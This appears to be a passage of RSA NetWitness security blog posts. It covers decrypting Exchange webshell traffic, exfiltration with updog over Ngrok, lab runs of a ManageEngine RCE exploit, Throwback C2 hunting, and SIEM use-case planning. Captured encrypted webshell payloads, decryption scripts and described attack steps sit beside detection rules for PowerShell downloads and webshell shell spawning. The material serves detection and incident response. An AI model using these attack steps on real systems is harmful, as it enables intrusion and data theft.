%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyO
Xzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd
%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUu
B7Rc%3D&nTzuZDVs=SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D

 

Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

2QfeQaDxyIZD4JjRv7tj0XmEwYRrdN5wFMCj5ROF2vV/7y7WUPkH2S7ZASsoQpNgX7F+aMek0q72blHF
kdKDQFwDVjPr9sBWR2grwHPsXENO2KFKle5i63TAOUzlHgs3LTwuGc/Md41r60l+5ke+xLhIKKXCHZTx
nG9BRHgtefPlFR8BEzlJcWA5SOgo+n29DZjqjhBeenMqL+d+DNECKjXdji8IIr/AsvWoEkiwuv05K04E
cJpjecIUzVKSkcgGmhCoijl5QEN8N32E//NkpfEgq/Rqsytf8xIwSDqUlTqObUwwq0BkOX79mI6WS5Zu
627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******

 

The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they can be quickly filtered out, especially when we see that the requests to this webshell do not even contain a User-Agent header. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:

 

The actual command follows the HTTP headers. Let's break down this command:

 

kByTsFZq=t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyOXzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUuB7Rc%3D&nTzuZDVs=SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D

 

The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********. The two parameter names in the request (kByTsFZq and nTzuZDVs) are simply the first 8 bytes of the key and the 8 bytes starting at offset 16, as seen in keyString.Substring(0, 8) and keyString.Substring(16, 8).

 

The data that follows the first 8 bytes of the key is shown below:

 

t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyOXzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUuB7Rc%3D

 

Let's decrypt this data step by step, and build a CyberChef recipe to do the job for us:

 

Step 1 - 3: The obfuscated data needs to be URL decoded; however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So, we first replace the + with a . (dot), URL decode, and then replace the . back with a +. The + character will not necessarily be in every chunk of Base64 encoded data, but we need to account for it in order to build an error-free recipe.

 

Decrypting: Step 1-3

 

Step 4 – 5: At this point we can Base64 decode the data. However, the data that we will get from this step is binary in nature, so we will convert to ASCII hex as well, since we need to use part of it for the AES IV.

 

Decryption: Step 4-5

 

Step 6 – 7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of Cyberchef to store these bytes in $R0, and then remove them with the Replace function:

 

Decryption: Step  6-7

 

Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.

 

Decryption: Step 8

 

The actual recipe is shown below:

 

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)
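For analysts who prefer to script the decryption instead, the same recipe can be reproduced outside of CyberChef. The following is a minimal sketch, assuming Python 3 with the pycryptodome package, and with the static key still redacted as in the decompiled code. It mirrors the steps above: URL decode, Base64 decode, peel off the 16-byte IV, then AES-CBC decrypt and strip the PKCS7 padding:

import base64
from urllib.parse import unquote

from Crypto.Cipher import AES           # pycryptodome
from Crypto.Util.Padding import unpad

KEY = b"kByTsFZq********nTzuZDVs********"   # static key from the decompiled DLL (redacted here)

def decrypt_blob(encoded, url_encoded=True):
    # Request parameters are percent-encoded; the response body is plain Base64.
    # urllib.parse.unquote leaves a literal '+' untouched, so the dot workaround
    # needed in the CyberChef recipe is not required here.
    raw = base64.b64decode(unquote(encoded) if url_encoded else encoded)
    iv, ciphertext = raw[:16], raw[16:]     # the first 16 bytes are the dynamic IV
    plain = unpad(AES.new(KEY, AES.MODE_CBC, iv).decrypt(ciphertext), AES.block_size)
    return plain.decode("utf-8", errors="replace")

# decrypt_blob(<value of the kByTsFZq or nTzuZDVs parameter>) for requests, or
# decrypt_blob(<response body>, url_encoded=False) for responses (with the real key).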

 

We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:

 

Decryption: Part 2

 

The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:

 

Decrypt Response

 

NetWitness Platform - Detection

 

The malicious activity in this incident will be detected at multiple stages by NetWitness Endpoint, from the exploit itself to the webshell activity and the subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor any web daemon processes (such as w3wp.exe) for uncommon behavior. Uncommon behavior for such processes primarily falls into three categories (a sample application rule for the first category is sketched after this list):

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).
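As a rough illustration of the first category, an application rule along the following lines could flag a web daemon spawning a shell. This is only a sketch built from the endpoint meta keys used later in this post; the exact process names and values should be validated and tuned for your environment:

(filename.src = 'w3wp.exe') && (filename.dst = 'cmd.exe','powershell.exe')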

 

NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:

 

Webshell detection rules

 

The process tree will also reveal the commands that are executed via the webshell in more detail:

 

Process flow

 

Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account

 

As part of your daily hunting, you should also always look at any Fileless_Scripts, which are common when encoded PowerShell commands are executed:

 

Fileless_Script events

 

From the NetWitness Packets perspective, such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends deploying such technology in your network to provide visibility into this type of traffic, since encrypted traffic makes up a substantial portion of every network.

 

Once the traffic is decrypted, there are several aspects of this traffic that are grouped into typical hunting paths related to the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:

 

Service Analysis

 

The webshell commands are found in the Query meta key:

 

Query meta key

 

In order to flag the lowercase request to /ews/exchange.asmx, we will need to set up a custom configuration using the SEARCH parser, which is disabled by default. We can do the same with the other lowercase headers, which are the characteristics we observed of whatever client the attacker is using to interact with this webshell. In NetWitness Platform we can quickly set this up in the search.ini file of your decoder. Any hits for this string can then be referenced in AppRules by using the expression (found = 'Lowercase EWS'), which can be combined with other metadata.
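As an illustration, a hypothetical application rule that combines the SEARCH parser hit with other metadata already seen in this traffic might look like the following (a sketch only; tune the conditions to your environment):

(found = 'Lowercase EWS') && (service = 80) && (action = 'post')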

 

Search.ini config

 

Conclusion

 

This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can always lead to early detection and reduced attacker dwell time. The NetWitness Platform will provide your team with the necessary visibility to detect and investigate such breaches.

 

Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.

Lee Kirkpatrick

What's updog?

Posted by Lee Kirkpatrick Employee Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and can use HTTP basic auth. It was created by sc0tfree and can be found on his GitHub page here. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind by its usage.

 

The Attack

We are starting updog with all the default settings on the attacker machine, which means it will expose the directory we are currently running it from over HTTP on port 9090:

 

In order to quickly make updog publicly accessible over the internet, we will use a service called Ngrok. This service exposes local servers behind NATs and firewalls to the public internet over secure tunnels. The free version of Ngrok creates a randomised URL with a lifetime of 8 hours if you have not registered for a free account:

 

This now means that we can access our updog server over the internet using the randomly generated Ngrok URL, and upload a file from the victim's machine:

 

The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok. They are commonly utilised in phishing campaigns as the generated URLs are randomised and short lived. With a recent update to the DynDNS parser from William Motley, we now tag many of these services in NetWitness under the Service Analysis meta key with the meta value, tunnel service:

 

 

Pivoting into this meta value, we can see there is some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious-sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename with a PNG image named updog.png:

 

 

Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:

 

 

NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:

 

Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:

 

Appliance: Packet Decoder
Description: Detects the usage of Updog
Logic: server begins 'werkzeug' && filename = 'updog.png'
Fidelity: High

 

 

Conclusion

As a defender, it is important to monitor traffic to services such as Ngrok, as they can pose a significant security risk to your organisation. There are also multiple alternatives to Ngrok, and traffic to those should be monitored as well. In order for the new meta value, tunnel service, to start tagging these services, make sure to update your DynDNS Lua parser.

Introduction

Security Operation Centres (SOCs) come in different forms (e.g. In-House, Outsourced, Hybrid etc.) and sizes, depending on multiple factors such as the objectives and functions that the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs there will be a SIEM, which acts as the brain of the SOC, picking up anomalies by correlating and making sense of the information coming in from various packet and log sources. More often than not, the efficiency of your SOC in detecting potential breaches in a timely manner depends very much on the SIEM itself: everything from having the correct sizing and configuration and being integrated with the relevant data sources, to having the right Use Cases deployed. In this post, we will be focusing on the strategy to plan and develop Use Cases that will lead to effective monitoring and detection in your SOC.

 

Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, many Use Cases may come to mind that would cater to different threat scenarios. Most SOCs typically start with the Out-Of-The-Box (OOTB) Use Cases that are available; however, these will not be sufficient in the long run. Hence, there is a need to also develop your own Use Cases on top of the OOTB ones. Use Case development is a lengthy and ongoing process, from identifying the problem statement to finetuning the Use Cases, and the threat landscape is constantly evolving on top of that. Therefore, it is always important to prioritise which Use Cases to develop first, and one of the best ways to do so is to come up with a roadmap.

 

When it comes to road-mapping your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK Framework (https://attack.mitre.org/) and the VERIS Framework (http://veriscommunity.net/), which are useful resources to aid you in your roadmap planning. However, it is important to note that while such frameworks form good references, they should not be taken wholesale when planning your organisation's Use Case development roadmap, because every organisation is unique and therefore not all areas are applicable. Prior to planning the roadmap, it is worthwhile to first perform a Priority Analysis, where you identify the priority areas on which the Use Cases should be focused, based on factors such as the following:

 

  •      Existing threat profile including top known threats,

 

  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)

 

  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.

 

With the Priority Analysis performed, you will then be able to identify your "Crown Jewels" and prioritise the protection efforts by developing the relevant Use Cases around them.

 

The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:

 

  1. Define Problem Statement. This highlights the "problem" that you wish to solve (i.e. the threat that you wish to detect) by having the Use Case, and gives rise to the objective of the Use Case which you are planning to develop. It is important to note that, in planning which Use Case to develop, the relevancy of a Use Case should not be determined solely based on the presence of indicators in past logs from the environment, because the fact that an incident (e.g. a breach) has not happened before does not mean it will not occur in the future (refer to the Priority Analysis explained in the previous section for a recap on how to identify relevant Use Cases).

 

  2. Develop High Level Logic. Once the objective of the Use Case is clear, the next step will be to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters such as the length of the "view" or "window" and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage as this may cloud your thinking and increase the chances of introducing errors into your logic design.

 

  3. Identify Data Requirements. Identify the packet and/or log sources that are required as inputs into the Use Case and check their availability in the production environment.

 

  4. Check Live Resource or Internal Library. Based on the high-level logic developed, always try to look for similar, existing Use Cases that are available in the Live Resource (more information at: https://community.rsa.com/docs/DOC-79978), community platforms or your own internal Use Case library, instead of developing them from scratch, as this helps to minimise development effort and reduce the chances of human error.

 

  5. Development. Proceed to develop the Use Case in syntax form, either by modifying existing references or by developing from scratch if there are no other alternatives.

 

  6. Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario which the Use Case is intended to detect to confirm that it is functioning correctly, before deploying it in the production environment. Note that there is an option in NetWitness to deploy the Use Case as a Trial Rule; more information can be found at: https://community.rsa.com/docs/DOC-78667.

 

  7. Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.

 

  •  Do note that while False Positives can be determined following triage, it is much more challenging to obtain an accurate picture of the False Negative rate, as this is only possible when you happen to learn of an actual breach where the relevant Use Case failed to trigger in your environment, i.e. you do not know what you do not know. In many instances, breaches can go undetected for a prolonged period of time, making the False Negative rate an extremely difficult metric to measure. Therefore, it is important to properly test the Use Case where possible, following initial deployment.

 

  8. Finetune. Now, should you stop yourself from deploying a particular Use Case for fear of introducing a potentially high False Positive rate? We all know that high false positive rates are one of an analyst's nightmares; however, we should not stop ourselves from deploying a particular Use Case into the environment simply because of this, because the Use Case exists in the first place to solve the "problem" defined in your Problem Statement. Rather, we should deploy, monitor and fine-tune the Use Case to reduce the False Positive rate over time. We do have to caution that this is not a one-time process and may require several iterations of review and finetuning over time to eventually stabilise the False Positive rate at an acceptable level.

 

  9. Regular Review. Again, as the threat landscape evolves constantly, we should put in place a process to conduct regular reviews of the existing Use Cases, finetuning or even retiring them if they are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.

 

Playbook

Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework, which spells out the high-level response process, it is recommended to go into the second order of detail and put in place the relevant Playbooks: step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the Playbooks during the Incident Response cycle, depending on the maturity level of the SOC:

 

  1. Printed Procedures. This is the least mature method of operating the Playbooks and is generally not recommended unless there are no other suitable alternatives.

 

  2. Shared Spreadsheet. This is suitable for small-scale or newly set-up SOCs which are not yet ready to invest in a SIRP or SOAR. For each new case, the relevant Playbook template can be pulled out, populated in an Excel spreadsheet (or equivalent) and deposited into a shared drive available to all SOC members, where analysts can update the incident response actions they have taken, while the SOC Manager, Incident Handler or Analyst Team Lead can track the status of open cases through these spreadsheets.

 

  3. SIRP. This is basically an Incident Management Platform which allows the analysts to easily apply the relevant Playbooks and update the status of incidents in a centralised platform. Compared to the spreadsheet method, a SIRP allows for stricter access control, in terms of being able to define and enforce different levels of permissions across different roles in the platform, as well as the ability to maintain an audit trail.

 

  4. SOAR. The Orchestrator provides a greater degree of automation in the incident response as compared to a SIRP, which could potentially cut down the response time and increase the overall efficiency of the analysts.

 

Conclusion

To conclude, there is no one-size-fits-all solution when it comes to developing the Use Cases in your organisation, and one of the recommended approaches is to define a short-to-medium term Use Case development roadmap customised to your environment. The roadmap should also be reviewed and revised from time to time to ensure that it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across the different phases of the Cyber Kill Chain, as shown below:

 

 

We hope that you find this useful in planning for the Use Cases to be developed in your organisation and happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). The description of how this works in full and the code can be found on his website, https://srcincite.io/advisories/src-2020-0011/. We thought we would have a quick run of this through the lab to see what indicators it leaves behind.

 

The Attack

Here we simply run the script and pass two parameters: the target and the command, which in this case uses cmd.exe to execute whoami and output the result to a file named si.txt:

 

We can then access the output via a browser and see that the command was executed as SYSTEM:

 

Here we execute ipconfig:

 

And grab the output:

 

The Detection in NetWitness Packets

The script sends an HTTP POST to the ManageEngine server as seen below. It targets the MDMLogUploaderServlet over its default port of 8383 to upload a file with controlled content for the deserialization vulnerability to work; in this instance the file is named logger.zip. The command to be executed can also be seen in the body of the POST:

The traffic by default for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.

 

This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:

 

This activity could be detected by using the following logic in an application rule:

(service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=') || (service = 80) && (action = 'get') && (directory = '/cewolf/')

 

The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as Java is what ManageEngine runs on. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand whether the behaviour is normal or not. From the below we can see java.exe spawning cmd.exe and running reconnaissance-type commands, such as whoami and ipconfig; this should stand out as odd:

 

The following application rule logic could be used to pick up on this activity. Here we are looking for Java being the source of execution, as well as for the string "tomcat" to narrow it down to the Apache Tomcat web servers that work as the backend for the ManageEngine application; the final part identifies fileless scripts or cmd.exe being executed by it:

(filename.src = 'java.exe') && (param.src contains 'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other Java-based web servers will likely show a similar pattern of behavior when being exploited.

 

 

Conclusion

As an analyst it is important to stay up to date with the latest security news to understand whether your organisation could potentially be at risk of compromise. Remote code execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date, and available patches should be applied as soon as possible to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will also delve a little deeper into the threat hunting process with NetWitness.

 

The Attack

After installing Throwback and compiling the executable for infection (which in this case we will just drop and execute manually), we will shortly see the successful connection back to the Throwback server:

 

Now that we have our endpoint communicating back with our server, we can execute typical reconnaissance-type commands against it, such as whoami:

 

Or tasklist to get a list of running processes:

 

This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:

 

 

Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove or disprove them; for this post, our hypothesis is going to be that there is C2 traffic. Hypotheses can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.

 

Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. What we are looking for defines the direction. In this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
  2. Secondly, you want to focus on a single protocol at a time. For our hypothesis, we could start with SSL; if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one to separate the data into smaller, more manageable buckets without getting distracted (service = 80)
  3. Now we want to hone in on the characteristics of the protocol and pull it apart. As we are looking for C2 communication, we would want to look for more mechanical-type behaviour - one meta key that helps with this is Service Analysis - the below figure shows some examples of meta values created based on HTTP

 

A great place to get more detail on using NetWitness for hunting can be found in the RSA NetWitness Hunting Guide: RSA NetWitness Hunting Guide PDF.

 

From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting on; you can choose to pivot on an individual meta value, or on multiple. We are going to start by pivoting on three, which are outlined below (a combined query is sketched after the list):

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere
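Putting these pivots together, the drill-down described here is equivalent to a query along the following lines (a sketch; the meta values are taken directly from the Service Analysis key shown above and can be applied individually or combined):

direction = 'outbound' && service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http single response' && analysis.service = 'http post no get no referer'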

 

After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:

 

Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLDSLD, etc. Based on the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:

 

Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes; the filename is the same every time, and the payload size is consistent apart from the initial communication, which could be a download of a second-stage module to further entrench itself. This could also be legitimate traffic: software simply checking in for updates, sending some usage data, etc.:

 

Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we get hold of the executable - keep reading to see!

 

Similarly we see another session which is the same but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.

 

NOTE: The network traffic as seen here would be post proxy, or traffic in a network with no explicit proxy settings (https://www.educba.com/types-of-proxy-servers/).

 

Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:

 

Opening the Events view for this meta value, we can see that an executable named, dwmss.exe, is making a network connection to de11-rs4[.]com:

 

Coming back to the Investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query: filename.src = 'dwmss.exe'. Here we can see the executable is running reconnaissance-type commands:

 

From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:

 

There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:

 

RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:

 

Navigating back to the packets and copying some of the Base64 from one of the POSTs, we can run it through the RC4 recipe on CyberChef with our proposed key; in the output we can see the data decodes successfully and contains information about the infected endpoint:
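The RC4 step itself is simple enough to reproduce outside of CyberChef as well. Below is a minimal sketch in plain Python of the standard RC4 algorithm; the key and data shown are placeholders standing in for the candidate string recovered from the strings output and the Base64 copied from the captured POST:

import base64

def rc4(key, data):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA): XOR the keystream with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Placeholder round trip; in practice the key is the string found in the binary and the
# data is base64.b64decode() of the Base64 copied from the POST body.
key = b"<candidate key from strings output>"
ciphertext = rc4(key, b"host=VICTIM-PC&user=admin")   # RC4 is symmetric
print(rc4(key, ciphertext))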

 

Now that we have confirmed this is malware, we should go back and look at all the activity generated by this process. This could be any file it has created, files dropped around the same time, folders it may be using, etc.

 

Conclusion

C2 frameworks are constantly being developed and improved upon, but as you can see from this C2 which is ~6 years old, their operation is fairly consistent with what we see today, and with the way NetWitness allows you to pull apart the characteristics of the protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows you to run queries directly from the address bar.

 

 

The following are the steps to follow in your browser to set this up.

 

  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."

 

 

 

  3. Click on "Add" to add a new search engine
  4. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing "keyword" followed by the <tab> key)
    • URL: This should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s (an example entry is shown after this list)
  5. Click on "Add" to add NetWitness as a Search Engine
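For illustration, assuming a hypothetical NetWitness server at 192.168.1.10 whose Broker shows up as device 6 in the Investigate URL, the completed entry might look like this:

Search Engine: NetWitness Broker
Keyword: nw
URL: https://192.168.1.10/investigation/6/navigate/query/%s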

 

 

Now, whenever you click on the address bar and type nw followed by the <tab> key (or whatever keyword you chose in the previous step), you can type your NetWitness query directly in the address bar and hit <enter> to run it against NetWitness.

 

 

 

We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!

 

The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.

 

The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 

 

Download the report and learn more about RSA NetWitness Platform.

_________________________________________________________________________________________________ 

Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

 

As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018

 

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.

 

The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.

 

Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?

 

After all, my lab environment is a fraction of the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of these keys, then it's downright laughable to expect any organization to even attempt to do the same.

 

Enter....automation and scripting to the rescue!

superhero entrance

 

The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
